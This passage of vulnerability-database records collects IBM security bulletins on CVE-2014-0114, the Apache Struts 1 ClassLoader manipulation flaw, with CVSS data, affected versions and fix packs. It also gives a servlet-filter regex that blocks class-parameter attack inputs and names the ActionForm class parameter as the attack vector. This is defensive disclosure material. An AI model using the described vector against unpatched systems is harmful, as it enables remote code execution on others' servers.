"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T13:02:01", "id": "ADD0F839178755FA4DD912718C067188513D949DB4F98877C9A6309ED84FA4C9", "href": "https://www.ibm.com/support/pages/node/513335", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:36", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in the Apache Struts 1 that is used by IBM WebSphere Application Server, IBM WebSphere Application Server Hypervisor Edition and IBM WebSphere Extended Deployment Compute Grid. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \nDescription: Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. Struts 1 is used by IBM WebSphere Application Server and IBM WebSphere Extended Deployment Compute grid. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nThis problem affects the following versions of the WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition: \n \n\u00b7 Version 7 \n\u00b7 Version 6.1 \n \nThis is not an issue with Version 8.0 or 8.5 of IBM WebSphere Application Server or IBM WebSphere Application Server Hypervisor Edition: \n \nThis problem affects the Modern Batch Feature Pack on WebSphere Application Server Version 7. \n \nThis problem also affects the following versions of WebSphere Extended Deployment Compute Grid: \n\u00b7 Version 8 on WebSphere Application Server Version 7 or Version 8 \n\u00b7 Version 6.1 on WebSphere Application Server Version 6.1 or Version 7 \n\n## Remediation/Fixes\n\nThe Apache Struts used by the Administrative Console in WebSphere Application Server and batch processing in IBM Compute Grid may be vulnerable to a class loader manipulation. IBM recommends installing recommended fixes as outlined below. \n \nIf your Java Web Application is using Apache Struts version 1.x that is available in WebSphere Application Server's optional libraries, you also may be vulnerable. You will need to verify if your application is affected. WebSphere Application Server Version 7.0 deprecated the inclusion of version 1.x of Struts in 2008. We recommend that you upgrade your Struts 1 from Apache to include a version of Struts that has this fixed. Your application should be thoroughly tested to verify that it does not have any issues. Please refer to the Apache site for information and download: [_Apache Struts Web site_](<http://struts.apache.org/>). (struts.apache.org) For more information on migrating from Struts 1 to Struts 2, please refer to the Apache Struts Migration Guide at [](<http://struts.apache.org/release/2.0.x/docs/migration-guide.html>) \n<http://struts.apache.org/docs/migration-guide.html> \n \nIf this mitigation will not work for you, please contact IBM Support. \n**Please note: IBM does not plan on shipping any fix for Struts 1.x as the fix is only available at the current levels of Apache Struts which can only be obtained from the Apache Struts website. ** \n \nImportant! IBM is planning on removing and no longer shipping all 4 versions of Struts Version 1.x from the optional Libraries starting in WebSphere Application Server 7.0.0.43, 8.0.0.13, 8.5.5.11 and 9.0.0.1. If you have copied the optional Struts packages to your shared library for your applications to use, you will need to take the following actions prior to moving to 7.0.0.43, 8.0.0.13, 8.5.5.11 or 9.0.0.1. \n \n\\- Upgrade your applications to use a current level of Struts \n\\- Include a copy of the Struts 1.x package from Apache that contains the fix as part of your ear file development. \n \n** \nFIXES** for WebSphere Application Server and batch processing in IBM Compute Grid: \nThe recommended solution is to apply the Fix Pack or PTF for each named product as soon as practical. There are 2 separate interim fixes that may need to be applied, links to Fix Central are provided below: \n \nAPARs \n[**PI17190**](<http://www-01.ibm.com/support/docview.wss?uid=swg24037506>)** **for the Administrative Console \n[**PI17420**](<http://www-01.ibm.com/support/docview.wss?uid=swg24037507>)** **for Administering batch jobs in Compute Grid \n\n**_Fix:_**Apply a Fix Pack or PTF containing the above APARs, as noted below: \n\n**For affected IBM WebSphere Application Server:**\n\n \n** \nFor V7.0.0.0 through 7.0.0.31:**\n\n * Apply Interim Fix [](<http://www-01.ibm.com/support/docview.wss?uid=swg24036992>)[PI17190](<http://www-01.ibm.com/support/docview.wss?uid=swg24037506>)\n\\--OR-- \n * Apply Fix Pack 7.0.0.33 or later.\n** \n****For V6.1.0.0 through 6.1.0.47:**\n\n * Apply Interim Fix [PI17190](<http://www-01.ibm.com/support/docview.wss?uid=swg24037506>)\n \n**For affected Modern Batch Feature Pack on WebSphere Application Server Version 7:** \n** \nFor V1.0.0.0 through 1.0.0.5:**\n\n * Contact IBM Support for the Interim Fix[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036992>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037506>)\n \n**For affected IBM WebSphere Application Server Extended Deployment Compute Grid:**\n\n**For Compute Grid V8.0.0.0 through 8.0.0.3 on WebSphere Application Server Version 8 or WebSphere Application Server Version 7**\n\n * Apply Interim Fixes [PI17420](<http://www-01.ibm.com/support/docview.wss?uid=swg24037507>)\n\\--OR-- \n * Apply Compute Grid Fix Pack 8.0.0.4 or later.\n** \nFor Compute Grid V6.1 on WebSphere Application Server Version 6.1 or 7.0:**\n\n * Contact IBM Support for the Interim Fix\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:11", "type": "ibm", "title": "Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:11", "id": "0976C176E97A39F9A89AE40E674AFB87A89A5DB439E2A1C90351D75E792A52BF", "href": "https://www.ibm.com/support/pages/node/509149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-19T13:40:06", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is\nbundled by IBM Rational Application Developer for WebSphere Software.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support\nalerts like this.**\n\n * Follow [this link](https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo) for more information (requires login with your IBM ID)\n\n \n---|--- \n \n**CVEID:** [_CVE-2014-0114_](http://cve.mitre.org/cgi-\nbin/cvename.cgi?name=CVE-2014-0114) \n\n \n**Description:** Apache Struts 1.X could allow a remote attacker to execute\narbitrary code on the system, caused by the failure to restrict the setting of\nClass Loader attributes. There is partial impact to confidentiality,\nintegrity, and availability. \n \n**CVSS Base Score:** 7.5 \n**CVSS Temporal Score:** See\n<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current\nscore \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector:** (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nRational Application Developer 7.0 to 9.1 are affected.\n\n## Remediation/Fixes\n\nThe issue can be addressed by installing a servlet filter to prevent passing\nan attack payload to the action servlet of your struts applications. \n \n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nRational Application Developer| 7.0 through to 9.1| PI18782|\n\n 1. Download [CVE-2014-0114_patch.jar](http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/IBM+Rational+Application+Developer+for+WebSphere+Software&release=All&platform=All&function=fixId&fixids=Rational-RAD-CVE-2014-0114-ifix&includeRequisites=1&includeSupersedes=0&downloadMethod=http)\n 2. Add a copy of the JAR file to the WEB-INF/lib/ folder of your Web module.\n 3. Modify your Web modules' deployment descriptor to ensure parameters passed to the struts code is filtered:\n 1. Open the Web module deployment descriptor (web.xml)\n 2. Add a new filter\n 1. Set the filter name to `ParamFilter`\n 2. Set the filter class to `com.ibm.rational.struts1x.patch.ParamFilter`\n 3. Add a new Initialization Parameter to the filter created in step 2.\n 1. Set the initialization parameter name to `excludeParams`\n 2. Set the initialization parameter value to the following: \n` \n``(.*\\.|^|.*|\\[('|\"))(c|C)lass(\\.|('|\")]|\\[).*`\n\n 4. Add a new filter mapping\n 1. Set the filter mapping name to `ParamFilter`\n 2. Add a new Servlet Name to the filter mapping\n 1. Set the name to be the name of the existing servlet for each Struts action.\n 5. Save the descriptor file\n\n \nThe end result will be the following: \n \n` \n<filter> \n<filter-name>ParamFilter</filter-name> \n<filter-class>com.ibm.rational.struts1x.patch.ParamFilter</filter-class> \n<init-param> \n<param-name>excludeParams</param-name> \n<param-value>(.*\\.|^|.*|\\[('|\"))(c|C)lass(\\.|('|\")]|\\[).*</param-value> \n</init-param> \n</filter> \n<filter-mapping> \n<filter-name>ParamFilter</filter-name> \n<servlet-name> ** _YOUR ACTION SERVLET_** </servlet-name> \n</filter-mapping> \n` \n \n**Note:** IBM does not plan on shipping any fix for Struts 1.x as the fix is\nonly available at the current levels of Apache Struts which can only be\nobtained from the Apache Struts website.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](\nhttp://www-01.ibm.com/software/support/einfo.html) to be notified of important\nproduct support alerts like this.\n\n### References\n\n[Complete CVSS v2 Guide](http://www.first.org/cvss/v2/guide \"Link resides\noutside of ibm.com\") \n[On-line Calculator v2](http://nvd.nist.gov/CVSS-v2-Calculator \"Link resides\noutside of ibm.com\")\n\nOff\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](http://www.ibm.com/security/secure-\nengineering/bulletins.html) \n[IBM Product Security Incident Response Blog](http://www.ibm.com/blogs/psirt)\n\n \n[Security Bulletin: ClassLoader manipulation with Apache Struts in WebSphere\nApplication Server affecting Rational Application Developer\n(CVE-2014-0114)](http://www.ibm.com/support/docview.wss?uid=swg21674339)\n\n## Change History\n\n* 28 May 2014: Original copy published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the\nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard\ndesigned to convey vulnerability severity and help to determine urgency and\npriority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY\nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT\nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Internal Use Only\n\nPSIRT Adv 1719, Record 36020\n\n[{\"Product\":{\"code\":\"SSRTLW\",\"label\":\"Rational Application Developer for\nWebSphere Software\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data\nPlatform\"},\"Component\":\"Web\nDevelopment\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF022\",\"label\":\"OS\nX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.0;7.0.0.1;7.0.0.10;7.0.0.2;7.0.0.3;7.0.0.4;7.0.0.5;7.0.0.6;7.0.0.7;7.0.0.8;7.0.0.9;7.5;7.5.1;7.5.2;7.5.3;7.5.4;7.5.5;7.5.5.1;7.5.5.2;7.5.5.3;7.5.5.4;7.5.5.5;8.0;8.0.1;8.0.2;8.0.3;8.0.4;8.0.4.1;8.0.4.2;8.0.4.3;8.5;8.5.1;8.5.5;9.0;9.0.1;9.1\",\"Edition\":\"\",\"Line\nof\nBusiness\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSJVRK\",\"label\":\"Rational\nApplication Developer Standard Edition for WebSphere Software\"},\"Business\nUnit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"\n\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.0;8.0.1;8.0.2;8.0.3;8.0.4;8.0.4.1;8.0.4.2;8.0.4.3\",\"Edition\":\"\",\"Line\nof Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2020-02-05T00:09:48", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting Rational Application Developer (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2020-02-05T00:09:48", "id": "78F585E499684A44D21982BB07C498E010C527FBE1866DD676965E7AAD25664A", "href": "https://www.ibm.com/support/pages/node/511385", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:54:06", "description": "## Summary\n\nApache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability by using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVE ID**: **CVE-2014-0114** \n \n**CVSS:** \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM InfoSphere Master Data Management - Collaborative Edition Versions 11.3, 11.0, 10.1 and 10.0 \u2013 GDS component only. \nIBM InfoSphere Master Data Management Server for Product Information Management Versions 9.1 and 9.0 \u2013 GDS component only.\n\n## Remediation/Fixes\n\nIf you are using the GDS component, the recommended solution is to apply the fix as soon as practical. Please see below for information on the fixes available. \n \n\n\n**_Product_**| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nIBM InfoSphere Master Data Management - Collaborative Edition| 11.0| None| [11.0-FP4](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=All&platform=All&function=all#>) \nIBM InfoSphere Master Data Management - Collaborative Edition| 11.3| None| [11.3-IF001](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/InfoSphere+Master+Data+Management+Collaboration+Server&release=11.3&platform=All&function=fixId&fixids=11.3.0.0-MDM-CE-IF001&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nIBM InfoSphere Master Data Management - Collaborative Edition| 10.1/10.0| None| Contact IBM Customer Support \nIBM InfoSphere Master Data Management Server for Product Information Management| 9.1/9.0| None| Contact IBM Customer Support \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2018-06-16T13:06:27", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts V1 ClassLoader manipulation vulnerability in GDS component of IBM\u00ae InfoSphere\u00ae Master Data Management - Collaborative Edition (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T13:06:27", "id": "0241AD14444530836D909285432DE0EF409B9993A9D61A28514B61A052400B84", "href": "https://www.ibm.com/support/pages/node/514877", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:39:24", "description": "## Summary\n\nApache Commons BeanUtils with Struts 1 does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM Sterling B2B Integrator 5.2 - 5.2.6\n\n## Remediation/Fixes\n\n**PRODUCT & Version **\n\n| \n\n**APAR**\n\n| \n\n**Remediation/Fix** \n \n---|---|--- \n \nIBM Sterling B2B Integrator 5.2 - 5.2.6\n\n| IT23546 | \n\nApply Fix Pack 5020603_5 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2020-02-05T00:53:36", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons BeanUtils Affects IBM Sterling B2B Integrator\u00a0(CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2020-02-05T00:53:36", "id": "9DDD0F190508F2E7A5678CB2D1EED7DBB6DDCF4E86557DF2759A163E2BE27792", "href": "https://www.ibm.com/support/pages/node/570171", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:33", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM WebSphere Business Services Fabric. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n\n## Vulnerability Details\n\nFor vulnerability details, see the Security Bulletin: [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316&myns=swgws&mynp=OCSSEQTP&mync=E>)\n\n## Affected Products and Versions\n\n**Affected product and version**\n\n| \n\n**Product and version shipped as a component** \n \n---|--- \n \nIBM WebSphere Business Services Fabric V7.0.x \n\n| \n\nIBM WebSphere Application Server V7.0.0.x \n \n## ", "cvss3": {}, "published": "2018-06-15T07:00:25", "type": "ibm", "title": "Security Bulletin: Security vulnerability in WebSphere Application Server, which is shipped with IBM WebSphere Business Services Fabric (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:25", "id": "F0757274DB5D8329D95D7A6D4A3997DE0A00111E7975DD730038A4C7F5615F5B", "href": "https://www.ibm.com/support/pages/node/511431", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:33", "description": "## Summary\n\nThere is a class loader manipulation vulnerability in Apache Struts (CVE-2014-0114) that affects WebSphere Lombardi Edition and IBM Business Process Manager.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**DESCRIPTION: **Apache Struts 1.X might allow a remote attacker to execute arbitrary code on the system, which is caused by the failure to restrict the setting of class loader attributes. An attacker might exploit this vulnerability using the class parameter of an ActionForm object to manipulate the class loader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \nThe affected products can be vulnerable in up to the following two different scenarios: \n\n* The product bundles WebSphere Application Server. The Integrated Solution Console in WebSphere Application Server V7 and earlier uses a vulnerable version of the struts library. For these products you need to apply a fix for WebSphere Application Server. \n* WebSphere Lombardi Edition and IBM Business Process Manager include various user interface components that make use of an additional instance of the vulnerable library and, therefore, need their own fix.\n\n## Affected Products and Versions\n\n**Product**\n\n| **Version**| **Vulnerable scenario**| **Relevant fix or fixes** \n---|---|---|--- \n \n * WebSphere Lombardi Edition\n| 7.2 and earlier| WebSphere Application Server administrative console and product-specific usage of struts| PI17190 and JR50221 \n \n * IBM Business Process Manager Standard\n * IBM Business Process Manager Express\n * IBM Business Process Manager Advanced\n| 7.5.x| WebSphere Application Server administrative console and product-specific usage of struts| PI17190 and JR50221 \n \n * IBM Business Process Manager Standard\n * IBM Business Process Manager Express\n * IBM Business Process Manager Advanced\n| 8.0.x, 8.5.x| Product-specific usage of struts| JR50221 \n \n## Remediation/Fixes\n\nThe recommended solutions is to apply interim fix JR50221 for WebSphere Lombardi Edition and IBM Business Process Manager as well as interim fix PI17190 for WebSphere Application Server V7 and earlier as described in the [WebSphere Application Server Security Bulletin](<http://www.ibm.com/support/docview.wss?uid=swg21672316>). \n \nJR50221 is available on FixCentral: \n\n * [WebSphere Lombardi Edition](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Lombardi+Edition&release=All&platform=All&function=aparId&apars=JR50221>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR50221>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR50221>)\n * [IBM Business Process Manager Advanced](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR50221>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:25", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts (CVE-2014-0114) affects WebSphere Lombardi Edition and IBM Business Process Manager (BPM)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:25", "id": "3E24178C007E709BA47FFA90778DD34D7B8EB78DA65A804C849ACB792DBEEBB8", "href": "https://www.ibm.com/support/pages/node/511527", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:34", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM WebSphere Process Server. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nFor vulnerability details read the security bulletin that is entitled [_Classloader Manipulation __Vulnerability__ in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316&myns=swgws&mynp=OCSSEQTP&mync=E>) .\n\n## Affected Products and Versions\n\n**Affected product and version**\n\n| \n\n**Product and version shipped as a ****component** \n \n---|--- \n \nIBM WebSphere Process Server V7.0.x \n\n| \n\nIBM WebSphere Application Server V7.0.0.x \n \n## ", "cvss3": {}, "published": "2018-06-15T07:00:24", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM WebSphere Process Server (WPS) (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:24", "id": "C2172119C7EA3C8DAF5775654958C15FAD557D43BF30EBA7616F82FFB6EA31E2", "href": "https://www.ibm.com/support/pages/node/511423", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:34", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Business Monitor. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nFor vulnerability details, see the [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) document for IBM WebSphere Application Server.\n\n## Affected Products and Versions\n\nThe following products are affected: \n\n * WebSphere Business Monitor 7.0.x\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:23", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Business Monitor (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:23", "id": "A10E7A45BAB7A017FB419F00D57064F9A2482F36ECDBC49D11E209F1CC8D8A4C", "href": "https://www.ibm.com/support/pages/node/511157", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:35", "description": "## Summary\n\nA class loader manipulation vulnerability exists in the Apache Struts 1, which is used by IBM WebSphere Application Server and is provided with WebSphere Enterprise Service Bus.\n\n## Vulnerability Details\n\nThis security vulnerability is fixed with available interim fixes and are targeted for specific WebSphere Application Server fix pack levels. For more information on these fixes, see [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>).\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:18", "type": "ibm", "title": "Security Bulletin: Class loader manipulation vulnerability in IBM WebSphere Application Server that shipped with WebSphere Enterprise Service Bus (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 